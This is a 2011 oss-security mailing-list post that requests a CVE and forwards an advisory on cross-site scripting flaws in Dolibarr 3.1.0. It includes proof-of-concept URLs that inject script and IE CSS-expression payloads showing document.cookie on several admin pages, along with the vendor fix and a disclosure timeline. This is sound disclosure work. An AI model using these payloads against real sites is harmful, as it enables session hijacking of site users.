|
Message-ID: <20111121092944.GA16253@foo.fgeek.fi> Date: Mon, 21 Nov 2011 11:29:44 +0200 From: Henri Salo <henri@...v.fi> To: oss-security@...ts.openwall.com Subject: Fwd: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0 Can I get CVE-identifier for this issue, thank you? I verified from infoserve.de that they haven't already requested one. Best regards, Henri Salo ----- Forwarded message from security@...oserve.de ----- Date: Wed, 9 Nov 2011 09:59:18 GMT From: security@...oserve.de To: bugtraq@...urityfocus.com Subject: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0 X-Mailer: MIME-tools 5.420 (Entity 5.420) Advisory: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0 Advisory ID: INFOSERVE-ADV2011-03 Author: Stefan Schurtz Contact: security@...oserve.de Affected Software: Successfully tested on Dolibarr 3.1.0 other versions may also be affected Vendor URL: http://www.dolibarr.org/ Vendor Status: fixed in the 3.1 branch ========================== Vulnerability Description ========================== Dolibarr 3.1.0 is prone to multiple XSS vulnerability ================== PoC-Exploit ================== Cross-Site-Scripting - parameter 'username' http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script> http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>&=3&optioncss=print IE-only http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie)) http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie)) http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie)) ========= Solution: ========= Fixed in the 3.1 branch ==================== Disclosure Timeline: ==================== 08-Nov-2011 - vendor informed 09-Nov-2011 - vendor fix in the 3.1 branch ======== Credits: ======== Vulnerabilities found and advisory written by INFOSERVE Security Team =========== References: =========== https://doliforge.org/tracker/?func=detail&aid=232&group_id=144 https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4207e78a1 http://www.dolibarr.org/ http://www.infoserve.de/ ----- End forwarded message -----
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.